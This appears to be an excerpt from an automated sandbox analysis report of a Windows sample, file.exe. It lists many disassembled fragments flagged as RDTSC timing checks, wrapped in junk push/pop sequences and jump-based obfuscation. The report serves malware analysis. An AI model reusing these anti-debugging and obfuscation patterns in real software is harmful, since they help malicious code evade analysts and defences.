                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2409FE second address: 240A10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F05ECFAD306h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 240A10 second address: 240A22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F05ECE231B8h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 240B51 second address: 240B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 240B59 second address: 240B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 240C98 second address: 240C9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 240C9C second address: 240CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F05ECE231C5h 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 242B3D second address: 242B67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a add dword ptr [esp], 19F65242h 0x00000011 xor dword ptr [ebp+122D1B2Eh], edx 0x00000017 push 4DD8A09Eh 0x0000001c push edi 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 242B67 second address: 242B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 242C7F second address: 242C99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD311h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24368E second address: 24369C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F05ECE231B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 243A57 second address: 243A5C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 243A5C second address: 243A69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 243A69 second address: 243A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F6246 second address: 1F624A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2457CE second address: 2457D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2457D4 second address: 2457F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jno 00007F05ECE231B8h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24589D second address: 2458D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05ECFAD319h 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F05ECFAD312h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2458D3 second address: 2458D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24623A second address: 24624F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F05ECFAD306h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop ecx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 246090 second address: 246096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 246096 second address: 24609A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 248350 second address: 248356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 246A42 second address: 246A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 249487 second address: 24949C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24AEA1 second address: 24AEA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 249C1A second address: 249C2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24AEA5 second address: 24AEC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F05ECFAD30Dh 0x0000000c js 00007F05ECFAD306h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 249C2D second address: 249C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25148D second address: 2514C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F05ECFAD306h 0x0000000a popad 0x0000000b jno 00007F05ECFAD313h 0x00000011 popad 0x00000012 push eax 0x00000013 push ecx 0x00000014 pushad 0x00000015 jmp 00007F05ECFAD313h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24D21E second address: 24D234 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECE231C2h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25303B second address: 253056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD317h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253056 second address: 25305C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25305C second address: 2530E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov bl, 4Dh 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edi 0x00000012 call 00007F05ECFAD308h 0x00000017 pop edi 0x00000018 mov dword ptr [esp+04h], edi 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc edi 0x00000025 push edi 0x00000026 ret 0x00000027 pop edi 0x00000028 ret 0x00000029 jmp 00007F05ECFAD30Eh 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebx 0x00000033 call 00007F05ECFAD308h 0x00000038 pop ebx 0x00000039 mov dword ptr [esp+04h], ebx 0x0000003d add dword ptr [esp+04h], 00000017h 0x00000045 inc ebx 0x00000046 push ebx 0x00000047 ret 0x00000048 pop ebx 0x00000049 ret 0x0000004a jmp 00007F05ECFAD317h 0x0000004f push eax 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F05ECFAD318h 0x00000057 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 253319 second address: 25331E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25331E second address: 253324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 255151 second address: 255158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 255158 second address: 2551AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F05ECFAD308h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 mov ebx, dword ptr [ebp+122D3244h] 0x0000002a push 00000000h 0x0000002c mov ebx, dword ptr [ebp+122D320Fh] 0x00000032 push 00000000h 0x00000034 push eax 0x00000035 and ebx, dword ptr [ebp+122D2535h] 0x0000003b pop ebx 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 jg 00007F05ECFAD306h 0x00000046 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2551AC second address: 2551B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2582AE second address: 2582B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2582B4 second address: 2582B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25A35E second address: 25A362 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25C266 second address: 25C2DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F05ECE231B8h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 clc 0x00000028 push 00000000h 0x0000002a xor bx, DB59h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007F05ECE231B8h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 0000001Ah 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b xchg eax, esi 0x0000004c jmp 00007F05ECE231BEh 0x00000051 push eax 0x00000052 push ecx 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25C2DA second address: 25C2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25D316 second address: 25D31A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25D31A second address: 25D320 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25D320 second address: 25D366 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jne 00007F05ECE231B6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F05ECE231B8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov ebx, esi 0x0000002b push 00000000h 0x0000002d xor edi, dword ptr [ebp+122D34BDh] 0x00000033 push 00000000h 0x00000035 mov ebx, dword ptr [ebp+122D34E1h] 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e push edi 0x0000003f pushad 0x00000040 popad 0x00000041 pop edi 0x00000042 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25C46C second address: 25C484 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD314h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25B41C second address: 25B421 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25C484 second address: 25C499 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD30Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25B421 second address: 25B4A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F05ECE231B6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 ja 00007F05ECE231B8h 0x00000016 mov bx, di 0x00000019 push dword ptr fs:[00000000h] 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 pushad 0x00000028 mov dword ptr [ebp+122D1B87h], edx 0x0000002e jmp 00007F05ECE231BAh 0x00000033 popad 0x00000034 mov eax, dword ptr [ebp+122D04DDh] 0x0000003a push FFFFFFFFh 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007F05ECE231B8h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 00000019h 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 mov edi, ecx 0x00000058 call 00007F05ECE231BDh 0x0000005d mov bx, E16Eh 0x00000061 pop ebx 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jmp 00007F05ECE231BBh 0x0000006a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25D583 second address: 25D5AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jbe 00007F05ECFAD308h 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 push edx 0x00000011 jmp 00007F05ECFAD315h 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25C499 second address: 25C49D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25B4A7 second address: 25B4AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25E48B second address: 25E490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25D5AE second address: 25D5B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25C49D second address: 25C4AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECE231BAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25B4AD second address: 25B4B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25E490 second address: 25E496 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25C4AB second address: 25C4B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25E496 second address: 25E49A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 25E49A second address: 25E49E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2614B7 second address: 2614C1 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F05ECE231B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2614C1 second address: 2614D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECFAD314h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2625E0 second address: 2625ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2625ED second address: 2625F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2627B7 second address: 2627BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2005D5 second address: 200605 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F05ECFAD316h 0x00000008 jmp 00007F05ECFAD30Eh 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F05ECFAD306h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 26B6E5 second address: 26B6F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jne 00007F05ECE231B6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 272762 second address: 272767 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 272767 second address: 272779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05ECE231BEh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2777F5 second address: 277808 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F05ECFAD306h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 277808 second address: 27780E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 203C80 second address: 203C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276436 second address: 276475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jl 00007F05ECE231CEh 0x0000000d jmp 00007F05ECE231C6h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F05ECE231C6h 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276475 second address: 276495 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05ECFAD313h 0x00000007 jnp 00007F05ECFAD306h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276495 second address: 27649D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276B77 second address: 276B7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276B7F second address: 276BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007F05ECE231B6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jno 00007F05ECE231B6h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b push esi 0x0000001c jng 00007F05ECE231B6h 0x00000022 pop esi 0x00000023 popad 0x00000024 pushad 0x00000025 js 00007F05ECE231C2h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276BAC second address: 276BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276BB2 second address: 276BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jbe 00007F05ECE231B6h 0x0000000b push eax 0x0000000c pop eax 0x0000000d jns 00007F05ECE231B6h 0x00000013 jmp 00007F05ECE231C6h 0x00000018 popad 0x00000019 pushad 0x0000001a js 00007F05ECE231B6h 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276BE5 second address: 276BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 276D6F second address: 276D8A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F05ECE231C3h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2771B8 second address: 2771C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop ebx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2771C7 second address: 2771E9 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F05ECE231B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F05ECE231C4h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2774A0 second address: 2774A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2774A5 second address: 2774AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
